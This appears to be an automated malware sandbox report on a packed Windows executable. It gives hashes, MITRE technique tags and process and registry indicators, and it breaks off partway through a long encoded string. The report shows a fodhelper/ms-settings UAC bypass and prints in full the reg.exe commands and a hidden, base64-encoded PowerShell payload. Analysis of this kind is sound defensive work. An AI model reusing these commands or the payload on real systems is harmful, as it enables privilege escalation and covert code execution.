e0db37b6df269163676caf35a629e7bfabe8400703967f9ddc6c3111d99e7775

General

Target

5ffc3d634e8989b4a9c27615117afa9d.exe
Size

59KB
MD5

5ffc3d634e8989b4a9c27615117afa9d
SHA1

95f0e2a408013d994448e8f8b552fb1494238d3d
SHA256

e0db37b6df269163676caf35a629e7bfabe8400703967f9ddc6c3111d99e7775
SHA512

93e06b951ed9227314e4f92c2e624a63289958f3bc23b8846a50d5a20d96ef7d6632ba0a22ab6fdd1c30071e741976d4e7158cd533567313cb1111f4bc25298d
SSDEEP

768:mNI41sOvvE1fFfjvbfLEjTspixL61BZ/J7iSD4B25fgOv14pQjvSMng24gnI1c:mKKsOHE1NDEjY5716BKfl4poSMnEx1c

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3116-132-0x0000000140000000-0x0000000140027000-memory.dmp	upx
behavioral2/memory/3116-144-0x0000000140000000-0x0000000140027000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5ffc3d634e8989b4a9c27615117afa9d.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	5ffc3d634e8989b4a9c27615117afa9d.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 15 IoCs

Processes:

reg.exereg.exefodhelper.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\ms-settings\CurVer\ = ".omg"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\ms-settings\CurVer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	fodhelper.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell\Open\command\ = "powershell.exe -w h -NoP -NonI -Exec Bypass -enc IABJAG4AdgBvAGsAZQAtAEUAeABQAFIARQBTAFMASQBvAG4AIAAoACgAIABuAEUAdwAtAE8AYgBKAGUAYwBUACAAIABtAGEAbgBhAEcARQBNAGUATgBUAC4AQQBVAFQATwBtAEEAdABJAG8AbgAuAFAAcwBDAHIAZQBkAEUAbgBUAGkAQQBMACAAJwAgACcALAAoACcANwA2ADQAOQAyAGQAMQAxADEANgA3ADQAMwBmADAANAAyADMANAAxADMAYgAxADYAMAA1ADAAYQA1ADMANAA1AE0AZwBCADgAQQBIAGsAQQBSAGcAQgBxAEEARgBnAEEAWQBRAEIAeQBBAEQAawBBAE8AQQBCADAAQQBIAGsAQQBhAEEAQQA0AEEARwBnAEEAZABnAEIAVgBBAEYAbwBBAFYAQQBCADUAQQBFAFEAQQBOAEEAQgBvAEEARwBjAEEAUABRAEEAOQBBAEgAdwBBAE8AQQBCAG0AQQBEAEkAQQBaAFEAQgBsAEEARABRAEEAWQB3AEIAawBBAEQAZwBBAE0AdwBCAGkAQQBHAEUAQQBZAGcAQgBrAEEARwBZAEEAWQB3AEIAagBBAEcAUQBBAE4AdwBCAGsAQQBEAGsAQQBOAHcAQgBqAEEARABrAEEAWgBnAEIAaQBBAEQAVQBBAE4AZwBBADUAQQBEAEUAQQBaAEEAQgBsAEEARABJAEEATQBnAEEAdwBBAEQAZwBBAE4AQQBBADUAQQBEAFEAQQBaAGcAQQA1AEEARwBFAEEATQB3AEIAbQBBAEcASQBBAE0AQQBBADEAQQBEAGsAQQBZAFEAQgBoAEEARABVAEEATwBBAEEAegBBAEcAWQBBAE4AZwBBAHoAQQBEAFEAQQBaAFEAQQB3AEEARABrAEEAWQBnAEEAegBBAEcARQBBAFoAZwBBADMAQQBHAEUAQQBOAEEAQgBqAEEARABjAEEATgBRAEEAdwBBAEQAVQBBAE4AQQBBADEAQQBEAFkAQQBZAHcAQgBpAEEARwBZAEEATwBBAEIAbQBBAEQAZwBBAE0AUQBCAGgAQQBEAEUAQQBNAHcAQQA0AEEARwBZAEEATwBRAEIAagBBAEcAUQBBAE4AdwBCAGoAQQBHAEUAQQBZAGcAQQA0AEEARABJAEEAWgBRAEEAMwBBAEcATQBBAE4AZwBBADUAQQBEAGcAQQBPAEEAQgBqAEEARABZAEEATQBBAEIAaQBBAEQASQBBAFkAZwBBAHoAQQBEAFUAQQBaAEEAQgBqAEEARwBRAEEATQBRAEEAMABBAEcASQBBAE0AZwBBAHcAQQBEAGsAQQBZAHcAQQAwAEEARwBFAEEATgB3AEIAbABBAEQATQBBAFoAUQBBADUAQQBHAEkAQQBZAHcAQQAyAEEARwBRAEEATgBRAEEAeABBAEQAawBBAE0AZwBBADQAQQBHAFEAQQBaAGcAQgBtAEEARABFAEEATQB3AEEAMgBBAEQAawBBAFkAZwBBADIAQQBHAFEAQQBOAHcAQQAxAEEARABNAEEATQBnAEEANABBAEQAUQBBAE4AZwBBAHcAQQBHAFUAQQBZAFEAQQAyAEEARABFAEEATQBBAEEANABBAEcARQBBAE0AZwBCAG0AQQBHAE0AQQBNAEEAQQAyAEEARABZAEEAWQBRAEEAMwBBAEQAawBBAE0AQQBBAHkAQQBHAE0AQQBNAHcAQgBpAEEARwBFAEEAWQB3AEIAbABBAEQARQBBAE4AZwBBAHgAQQBHAFUAQQBZAFEAQQA1AEEARABZAEEATQBnAEEAeABBAEQAawBBAE4AUQBBADUAQQBEAEEAQQBNAGcAQQAwAEEARwBFAEEATgBnAEEAeABBAEQAWQBBAE0AdwBBAHkAQQBEAFkAQQBOAFEAQQAzAEEARABNAEEATwBBAEIAbQBBAEQAawBBAFkAdwBCAGgAQQBHAFUAQQBOAGcAQQAzAEEARABBAEEATwBBAEEANABBAEcARQBBAE0AQQBCAGkAQQBEAEUAQQBNAEEAQgBpAEEARwBFAEEATQBRAEIAawBBAEcATQBBAFkAUQBCAG0AQQBEAEEAQQBNAEEAQQB3AEEARABJAEEATQBBAEEAMwBBAEQAVQBBAFkAZwBBADQAQQBHAFUAQQBNAFEAQgBrAEEARABNAEEAWQBRAEEANQBBAEQAWQBBAE0AUQBCAGoAQQBHAFEAQQBZAFEAQQA1AEEARwBZAEEATQBnAEEAdwBBAEcATQBBAE0AQQBCAGsAQQBHAEkAQQBOAGcAQQB6AEEARABBAEEATQB3AEEANABBAEQAQQBBAFkAZwBBADUAQQBEAEUAQQBOAFEAQgBrAEEARABFAEEAWQBRAEEAMgBBAEcARQBBAE4AQQBBADIAQQBEAGMAQQBOAGcAQQB4AEEARABrAEEATgB3AEIAaABBAEcAUQBBAE0AQQBBADMAQQBHAFEAQQBNAGcAQQB6AEEARwBNAEEATQBnAEEANQBBAEcAWQBBAE0AdwBCAGwAQQBEAEUAQQBPAEEAQQB4AEEARABnAEEATQBRAEIAawBBAEQAawBBAE0AUQBCAG0AQQBEAFkAQQBNAGcAQQAyAEEARABnAEEAWgBRAEEANQBBAEQARQBBAE0AQQBBAHcAQQBEAEUAQQBPAEEAQQAwAEEARABBAEEATQBBAEEANABBAEQATQBBAE0AQQBBAHgAQQBHAFUAQQBNAFEAQQB4AEEARwBNAEEATwBBAEIAaABBAEQASQBBAE0AUQBCAGsAQQBEAEUAQQBOAHcAQgBtAEEARwBRAEEATgBBAEEAMgBBAEQAYwBBAE8AUQBBAHkAQQBEAFEAQQBaAGcAQQB6AEEARwBNAEEAWQBRAEIAagBBAEQAWQBBAFkAdwBBADQAQQBEAEEAQQBNAEEAQQAyAEEARwBNAEEATQBRAEIAaABBAEcARQBBAE8AQQBCAGoAQQBHAFkAQQBNAGcAQgBqAEEARwBFAEEATQBnAEIAagBBAEcARQBBAE0AdwBBAHoAQQBEAFkAQQBOAFEAQgBqAEEARABjAEEAWgBBAEIAaABBAEQAWQBBAFkAUQBCAGoAQQBHAFEAQQBOAFEAQQB6AEEARABnAEEATQBnAEIAawBBAEQASQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQAxAEEARABZAEEATgBBAEEAMgBBAEcAVQBBAE0AdwBCAG0AQQBEAFUAQQBZAGcAQgBpAEEARwBVAEEATgBBAEIAaABBAEQASQBBAE0AZwBBADEAQQBEAGsAQQBOAEEAQQB3AEEARwBRAEEAWgBnAEIAagBBAEQARQBBAFoAQQBBADAAQQBHAEkAQQBOAHcAQgBsAEEARABjAEEATQBnAEIAbABBAEQAUQBBAE0AZwBCAGoAQQBEAEEAQQBPAEEAQQAyAEEARABFAEEATgBnAEEANQBBAEcAWQBBAFkAZwBBADIAQQBEAEUAQQBOAEEAQQB3AEEARABVAEEATgBRAEEAMgBBAEQARQBBAFkAUQBCAGsAQQBHAFUAQQBaAGcAQgBsAEEARwBJAEEATgBRAEIAaABBAEQASQBBAE0AZwBCAGkAQQBHAFEAQQBZAHcAQQAyAEEARwBJAEEAWQBnAEEAegBBAEQAawBBAE0AZwBBADUAQQBHAFUAQQBaAEEAQQB4AEEARABrAEEATQB3AEEAeABBAEQAQQBBAFoAZwBBAHkAQQBHAFEAQQBNAFEAQQAwAEEARwBFAEEATwBBAEIAbQBBAEcARQBBAFoAQQBBADQAQQBEAEUAQQBaAFEAQQB5AEEARABJAEEATgBRAEIAaABBAEQAWQBBAE0AdwBBADMAQQBEAGMAQQBPAFEAQQA1AEEARwBVAEEATwBRAEEAMwBBAEcASQBBAFoAZwBCAGkAQQBEAFkAQQBNAHcAQQA0AEEARABNAEEATgBnAEEAdwBBAEQAUQBBAFkAdwBBAHcAQQBHAEUAQQBNAFEAQQB4AEEARABBAEEATQB3AEEAeQBBAEQAUQBBAE0AdwBCAGkAQQBHAE0AQQBOAHcAQgBtAEEARwBFAEEATwBBAEIAaQBBAEQAUQBBAFoAUQBCAGwAQQBHAEUAQQBOAEEAQQAwAEEARABBAEEAWQB3AEIAawBBAEcAUQBBAE4AQQBBAHoAQQBHAEkAQQBNAGcAQQB5AEEARwBNAEEATwBRAEEAeABBAEQASQBBAE8AUQBBADEAQQBEAFEAQQBOAEEAQgBrAEEARwBRAEEATgBRAEIAaABBAEcATQBBAFoAUQBBADAAQQBHAEkAQQBNAHcAQQB6AEEARABrAEEATQB3AEEAeABBAEQAVQBBAFoAQQBBADUAQQBHAFkAQQBOAFEAQgBpAEEARABjAEEATQBnAEIAawBBAEQAWQBBAE0AdwBBADEAQQBHAFUAQQBZAGcAQQB5AEEARABrAEEATQBBAEIAagBBAEcARQBBAE0AdwBCAGoAQQBHAEUAQQBNAHcAQQAzAEEARABrAEEATgBBAEEAegBBAEcATQBBAFoAUQBBAHgAQQBEAFUAQQBOAHcAQgBtAEEARABFAEEATQBnAEEAdwBBAEcAUQBBAFkAdwBCAGkAQQBEAFUAQQBPAFEAQQB5AEEARABjAEEATQBBAEEAMABBAEQAawBBAE4AUQBBAHgAQQBHAE0AQQBZAHcAQQB4AEEARwBVAEEAWQBRAEIAawBBAEQASQBBAE4AUQBBADUAQQBEAGsAQQBaAEEAQgBoAEEARABFAEEATQBnAEEAMQBBAEcATQBBAE4AdwBCAGoAQQBEAGsAQQBOAEEAQQAwAEEARwBZAEEAWgBnAEIAawBBAEQAQQBBAFkAZwBCAGoAQQBEAFUAQQBOAHcAQgBtAEEARABJAEEATQBnAEIAagBBAEQAQQBBAE8AQQBBADUAQQBEAFEAQQBPAEEAQQAwAEEARwBRAEEATQBRAEEANQBBAEQAUQBBAFkAdwBBADIAQQBEAEEAQQBaAEEAQQB4AEEARwBVAEEATQBnAEIAaABBAEQAYwBBAE0AZwBBADIAQQBEAEUAQQBOAGcAQgBrAEEARwBRAEEATQBnAEEANQBBAEQASQBBAE8AUQBCAGwAQQBHAFUAQQBZAFEAQgBsAEEARwBJAEEAWgBnAEEAMwBBAEQAUQBBAFoAQQBBADUAQQBEAEUAQQBNAGcAQQB4AEEARwBFAEEAWgBBAEIAbQBBAEQAWQBBAFkAUQBBADMAQQBEAEkAQQBPAFEAQQA0AEEARABnAEEAWgBnAEEAMQBBAEcAUQBBAE4AUQBBAHcAQQBEAFUAQQBZAFEAQgBqAEEARABVAEEATQBRAEEANABBAEcARQBBAFkAUQBBADEAQQBEAGMAQQBZAGcAQQAyAEEARABBAEEATgBBAEIAbQBBAEQAYwBBAE4AUQBBADUAQQBEAGMAQQBNAGcAQgBpAEEARwBRAEEAWgBBAEIAbQBBAEQAVQBBAE0AdwBBADQAQQBEAEUAQQBOAFEAQQB6AEEARwBVAEEATQBnAEEAMQBBAEQAQQBBAE4AQQBBADMAQQBHAEkAQQBNAHcAQQB4AEEARABFAEEAWQBRAEEAdwBBAEcAVQBBAE4AZwBBADEAQQBEAGMAQQBNAHcAQgBsAEEARwBRAEEATgB3AEEAdwBBAEcASQBBAE4AZwBBADMAQQBEAEUAQQBNAEEAQQA0AEEARABZAEEAWgBRAEEAegBBAEQATQBBAFkAdwBBADUAQQBEAGMAQQBZAHcAQgBqAEEARABjAEEATgB3AEEAMQBBAEQAWQBBAFoAZwBBAHgAQQBEAGcAQQBaAEEAQgBsAEEARABVAEEATgBRAEEAdwBBAEQAawBBAFkAZwBBADMAQQBEAGcAQQBOAHcAQgBoAEEARABjAEEATQBRAEEAeABBAEQARQBBAE0AUQBBAHkAQQBEAGsAQQBOAEEAQgBtAEEARABJAEEATgB3AEEANQBBAEQASQBBAE8AQQBBAHgAQQBEAE0AQQBZAFEAQQAxAEEARABjAEEATgBnAEIAawBBAEcASQBBAE0AZwBBADIAQQBHAFUAQQBNAHcAQQB4AEEARwBZAEEAWQBRAEEANABBAEEAPQA9ACcAIAB8AGMAbwBOAFYARQByAFQAVABvAC0AUwBFAEMAVQBSAGUAcwB0AFIAaQBOAEcAIAAtAEsAIAAzACwAMQA4ADMALAAzADAALAAyADQAMgAsADQANgAsADUANAAsADEAMQAwACwANgAsADEANgA5ACwANwAxACwAOAA4ACwAMQA4ADIALAA5ADUALAAxADkAMwAsADEAMAA4ACwAMgAxADcALAA3ADUALAAyADIAMwAsADIANQAzACwANgAyACwAMgAxADUALAA4ADkALAAyADUAMwAsADIAMgA5ACkAIAApAC4ARwBFAFQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgBUAGkAYQBsACgAKQAuAFAAYQBTAHMAdwBPAFIAZAApACAA "	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\.omg\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\ms-settings\CurVer	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exe

pid process

4040 reg.exe
5028 reg.exe
400 reg.exe
3636 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exePowerShell.exe

pid process

3724 powershell.exe
3724 powershell.exe
3128 PowerShell.exe
3128 PowerShell.exe

pid	process
4040	reg.exe
5028	reg.exe
400	reg.exe
3636	reg.exe

pid	process
3724	powershell.exe
3724	powershell.exe
3128	PowerShell.exe
3128	PowerShell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exePowerShell.exe

description	pid	process
Token: SeDebugPrivilege	3724	powershell.exe
Token: SeDebugPrivilege	3128	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	3128	PowerShell.exe
Token: SeSecurityPrivilege	3128	PowerShell.exe
Token: SeTakeOwnershipPrivilege	3128	PowerShell.exe
Token: SeLoadDriverPrivilege	3128	PowerShell.exe
Token: SeSystemProfilePrivilege	3128	PowerShell.exe
Token: SeSystemtimePrivilege	3128	PowerShell.exe
Token: SeProfSingleProcessPrivilege	3128	PowerShell.exe
Token: SeIncBasePriorityPrivilege	3128	PowerShell.exe
Token: SeCreatePagefilePrivilege	3128	PowerShell.exe
Token: SeBackupPrivilege	3128	PowerShell.exe
Token: SeRestorePrivilege	3128	PowerShell.exe
Token: SeShutdownPrivilege	3128	PowerShell.exe
Token: SeDebugPrivilege	3128	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	3128	PowerShell.exe
Token: SeRemoteShutdownPrivilege	3128	PowerShell.exe
Token: SeUndockPrivilege	3128	PowerShell.exe
Token: SeManageVolumePrivilege	3128	PowerShell.exe
Token: 33	3128	PowerShell.exe
Token: 34	3128	PowerShell.exe
Token: 35	3128	PowerShell.exe
Token: 36	3128	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	3128	PowerShell.exe
Token: SeSecurityPrivilege	3128	PowerShell.exe
Token: SeTakeOwnershipPrivilege	3128	PowerShell.exe
Token: SeLoadDriverPrivilege	3128	PowerShell.exe
Token: SeSystemProfilePrivilege	3128	PowerShell.exe
Token: SeSystemtimePrivilege	3128	PowerShell.exe
Token: SeProfSingleProcessPrivilege	3128	PowerShell.exe
Token: SeIncBasePriorityPrivilege	3128	PowerShell.exe
Token: SeCreatePagefilePrivilege	3128	PowerShell.exe
Token: SeBackupPrivilege	3128	PowerShell.exe
Token: SeRestorePrivilege	3128	PowerShell.exe
Token: SeShutdownPrivilege	3128	PowerShell.exe
Token: SeDebugPrivilege	3128	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	3128	PowerShell.exe
Token: SeRemoteShutdownPrivilege	3128	PowerShell.exe
Token: SeUndockPrivilege	3128	PowerShell.exe
Token: SeManageVolumePrivilege	3128	PowerShell.exe
Token: 33	3128	PowerShell.exe
Token: 34	3128	PowerShell.exe
Token: 35	3128	PowerShell.exe
Token: 36	3128	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	3128	PowerShell.exe
Token: SeSecurityPrivilege	3128	PowerShell.exe
Token: SeTakeOwnershipPrivilege	3128	PowerShell.exe
Token: SeLoadDriverPrivilege	3128	PowerShell.exe
Token: SeSystemProfilePrivilege	3128	PowerShell.exe
Token: SeSystemtimePrivilege	3128	PowerShell.exe
Token: SeProfSingleProcessPrivilege	3128	PowerShell.exe
Token: SeIncBasePriorityPrivilege	3128	PowerShell.exe
Token: SeCreatePagefilePrivilege	3128	PowerShell.exe
Token: SeBackupPrivilege	3128	PowerShell.exe
Token: SeRestorePrivilege	3128	PowerShell.exe
Token: SeShutdownPrivilege	3128	PowerShell.exe
Token: SeDebugPrivilege	3128	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	3128	PowerShell.exe
Token: SeRemoteShutdownPrivilege	3128	PowerShell.exe
Token: SeUndockPrivilege	3128	PowerShell.exe
Token: SeManageVolumePrivilege	3128	PowerShell.exe
Token: 33	3128	PowerShell.exe
Token: 34	3128	PowerShell.exe
Token: 35	3128	PowerShell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

5ffc3d634e8989b4a9c27615117afa9d.exepowershell.exefodhelper.exe

description	pid	process	target process
PID 3116 wrote to memory of 3724	3116	5ffc3d634e8989b4a9c27615117afa9d.exe	powershell.exe
PID 3116 wrote to memory of 3724	3116	5ffc3d634e8989b4a9c27615117afa9d.exe	powershell.exe
PID 3724 wrote to memory of 4040	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 4040	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 5028	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 5028	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 4372	3724	powershell.exe	fodhelper.exe
PID 3724 wrote to memory of 4372	3724	powershell.exe	fodhelper.exe
PID 4372 wrote to memory of 3128	4372	fodhelper.exe	PowerShell.exe
PID 4372 wrote to memory of 3128	4372	fodhelper.exe	PowerShell.exe
PID 3724 wrote to memory of 400	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 400	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 3636	3724	powershell.exe	reg.exe
PID 3724 wrote to memory of 3636	3724	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\5ffc3d634e8989b4a9c27615117afa9d.exe
"C:\Users\Admin\AppData\Local\Temp\5ffc3d634e8989b4a9c27615117afa9d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\398E.tmp\398F.tmp\3990.ps1
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d "powershell.exe -w h -NoP -NonI -Exec Bypass -enc IABJAG4AdgBvAGsAZQAtAEUAeABQAFIARQBTAFMASQBvAG4AIAAoACgAIABuAEUAdwAtAE8AYgBKAGUAYwBUACAAIABtAGEAbgBhAEcARQBNAGUATgBUAC4AQQBVAFQATwBtAEEAdABJAG8AbgAuAFAAcwBDAHIAZQBkAEUAbgBUAGkAQQBMACAAJwAgACcALAAoACcANwA2ADQAOQAyAGQAMQAxADEANgA3ADQAMwBmADAANAAyADMANAAxADMAYgAxADYAMAA1ADAAYQA1ADMANAA1AE0AZwBCADgAQQBIAGsAQQBSAGcAQgBxAEEARgBnAEEAWQBRAEIAeQBBAEQAawBBAE8AQQBCADAAQQBIAGsAQQBhAEEAQQA0AEEARwBnAEEAZABnAEIAVgBBAEYAbwBBAFYAQQBCADUAQQBFAFEAQQBOAEEAQgBvAEEARwBjAEEAUABRAEEAOQBBAEgAdwBBAE8AQQBCAG0AQQBEAEkAQQBaAFEAQgBsAEEARABRAEEAWQB3AEIAawBBAEQAZwBBAE0AdwBCAGkAQQBHAEUAQQBZAGcAQgBrAEEARwBZAEEAWQB3AEIAagBBAEcAUQBBAE4AdwBCAGsAQQBEAGsAQQBOAHcAQgBqAEEARABrAEEAWgBnAEIAaQBBAEQAVQBBAE4AZwBBADUAQQBEAEUAQQBaAEEAQgBsAEEARABJAEEATQBnAEEAdwBBAEQAZwBBAE4AQQBBADUAQQBEAFEAQQBaAGcAQQA1AEEARwBFAEEATQB3AEIAbQBBAEcASQBBAE0AQQBBADEAQQBEAGsAQQBZAFEAQgBoAEEARABVAEEATwBBAEEAegBBAEcAWQBBAE4AZwBBAHoAQQBEAFEAQQBaAFEAQQB3AEEARABrAEEAWQBnAEEAegBBAEcARQBBAFoAZwBBADMAQQBHAEUAQQBOAEEAQgBqAEEARABjAEEATgBRAEEAdwBBAEQAVQBBAE4AQQBBADEAQQBEAFkAQQBZAHcAQgBpAEEARwBZAEEATwBBAEIAbQBBAEQAZwBBAE0AUQBCAGgAQQBEAEUAQQBNAHcAQQA0AEEARwBZAEEATwBRAEIAagBBAEcAUQBBAE4AdwBCAGoAQQBHAEUAQQBZAGcAQQA0AEEARABJAEEAWgBRAEEAMwBBAEcATQBBAE4AZwBBADUAQQBEAGcAQQBPAEEAQgBqAEEARABZAEEATQBBAEIAaQBBAEQASQBBAFkAZwBBAHoAQQBEAFUAQQBaAEEAQgBqAEEARwBRAEEATQBRAEEAMABBAEcASQBBAE0AZwBBAHcAQQBEAGsAQQBZAHcAQQAwAEEARwBFAEEATgB3AEIAbABBAEQATQBBAFoAUQBBADUAQQBHAEkAQQBZAHcAQQAyAEEARwBRAEEATgBRAEEAeABBAEQAawBBAE0AZwBBADQAQQBHAFEAQQBaAGcAQgBtAEEARABFAEEATQB3AEEAMgBBAEQAawBBAFkAZwBBADIAQQBHAFEAQQBOAHcAQQAxAEEARABNAEEATQBnAEEANABBAEQAUQBBAE4AZwBBAHcAQQBHAFUAQQBZAFEAQQAyAEEARABFAEEATQBBAEEANABBAEcARQBBAE0AZwBCAG0AQQBHAE0AQQBNAEEAQQAyAEEARABZAEEAWQBRAEEAMwBBAEQAawBBAE0AQQBBAHkAQQBHAE0AQQBNAHcAQgBpAEEARwBFAEEAWQB3AEIAbABBAEQARQBBAE4AZwBBAHgAQQBHAFUAQQBZAFEAQQA1AEEARABZAEEATQBnAEEAeABBAEQAawBBAE4AUQBBADUAQQBEAEEAQQBNAGcAQQAwAEEARwBFAEEATgBnAEEAeABBAEQAWQBBAE0AdwBBAHkAQQBEAFkAQQBOAFEAQQAzAEEARABNAEEATwBBAEIAbQBBAEQAawBBAFkAdwBCAGgAQQBHAFUAQQBOAGcAQQAzAEEARABBAEEATwBBAEEANABBAEcARQBBAE0AQQBCAGkAQQBEAEUAQQBNAEEAQgBpAEEARwBFAEEATQBRAEIAawBBAEcATQBBAFkAUQBCAG0AQQBEAEEAQQBNAEEAQQB3AEEARABJAEEATQBBAEEAMwBBAEQAVQBBAFkAZwBBADQAQQBHAFUAQQBNAFEAQgBrAEEARABNAEEAWQBRAEEANQBBAEQAWQBBAE0AUQBCAGoAQQBHAFEAQQBZAFEAQQA1AEEARwBZAEEATQBnAEEAdwBBAEcATQBBAE0AQQBCAGsAQQBHAEkAQQBOAGcAQQB6AEEARABBAEEATQB3AEEANABBAEQAQQBBAFkAZwBBADUAQQBEAEUAQQBOAFEAQgBrAEEARABFAEEAWQBRAEEAMgBBAEcARQBBAE4AQQBBADIAQQBEAGMAQQBOAGcAQQB4AEEARABrAEEATgB3AEIAaABBAEcAUQBBAE0AQQBBADMAQQBHAFEAQQBNAGcAQQB6AEEARwBNAEEATQBnAEEANQBBAEcAWQBBAE0AdwBCAGwAQQBEAEUAQQBPAEEAQQB4AEEARABnAEEATQBRAEIAawBBAEQAawBBAE0AUQBCAG0AQQBEAFkAQQBNAGcAQQAyAEEARABnAEEAWgBRAEEANQBBAEQARQBBAE0AQQBBAHcAQQBEAEUAQQBPAEEAQQAwAEEARABBAEEATQBBAEEANABBAEQATQBBAE0AQQBBAHgAQQBHAFUAQQBNAFEAQQB4AEEARwBNAEEATwBBAEIAaABBAEQASQBBAE0AUQBCAGsAQQBEAEUAQQBOAHcAQgBtAEEARwBRAEEATgBBAEEAMgBBAEQAYwBBAE8AUQBBAHkAQQBEAFEAQQBaAGcAQQB6AEEARwBNAEEAWQBRAEIAagBBAEQAWQBBAFkAdwBBADQAQQBEAEEAQQBNAEEAQQAyAEEARwBNAEEATQBRAEIAaABBAEcARQBBAE8AQQBCAGoAQQBHAFkAQQBNAGcAQgBqAEEARwBFAEEATQBnAEIAagBBAEcARQBBAE0AdwBBAHoAQQBEAFkAQQBOAFEAQgBqAEEARABjAEEAWgBBAEIAaABBAEQAWQBBAFkAUQBCAGoAQQBHAFEAQQBOAFEAQQB6AEEARABnAEEATQBnAEIAawBBAEQASQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQAxAEEARABZAEEATgBBAEEAMgBBAEcAVQBBAE0AdwBCAG0AQQBEAFUAQQBZAGcAQgBpAEEARwBVAEEATgBBAEIAaABBAEQASQBBAE0AZwBBADEAQQBEAGsAQQBOAEEAQQB3AEEARwBRAEEAWgBnAEIAagBBAEQARQBBAFoAQQBBADAAQQBHAEkAQQBOAHcAQgBsAEEARABjAEEATQBnAEIAbABBAEQAUQBBAE0AZwBCAGoAQQBEAEEAQQBPAEEAQQAyAEEARABFAEEATgBnAEEANQBBAEcAWQBBAFkAZwBBADIAQQBEAEUAQQBOAEEAQQB3AEEARABVAEEATgBRAEEAMgBBAEQARQBBAFkAUQBCAGsAQQBHAFUAQQBaAGcAQgBsAEEARwBJAEEATgBRAEIAaABBAEQASQBBAE0AZwBCAGkAQQBHAFEAQQBZAHcAQQAyAEEARwBJAEEAWQBnAEEAegBBAEQAawBBAE0AZwBBADUAQQBHAFUAQQBaAEEAQQB4AEEARABrAEEATQB3AEEAeABBAEQAQQBBAFoAZwBBAHkAQQBHAFEAQQBNAFEAQQAwAEEARwBFAEEATwBBAEIAbQBBAEcARQBBAFoAQQBBADQAQQBEAEUAQQBaAFEAQQB5AEEARABJAEEATgBRAEIAaABBAEQAWQBBAE0AdwBBADMAQQBEAGMAQQBPAFEAQQA1AEEARwBVAEEATwBRAEEAMwBBAEcASQBBAFoAZwBCAGkAQQBEAFkAQQBNAHcAQQA0AEEARABNAEEATgBnAEEAdwBBAEQAUQBBAFkAdwBBAHcAQQBHAEUAQQBNAFEAQQB4AEEARABBAEEATQB3AEEAeQBBAEQAUQBBAE0AdwBCAGkAQQBHAE0AQQBOAHcAQgBtAEEARwBFAEEATwBBAEIAaQBBAEQAUQBBAFoAUQBCAGwAQQBHAEUAQQBOAEEAQQAwAEEARABBAEEAWQB3AEIAawBBAEcAUQBBAE4AQQBBAHoAQQBHAEkAQQBNAGcAQQB5AEEARwBNAEEATwBRAEEAeABBAEQASQBBAE8AUQBBADEAQQBEAFEAQQBOAEEAQgBrAEEARwBR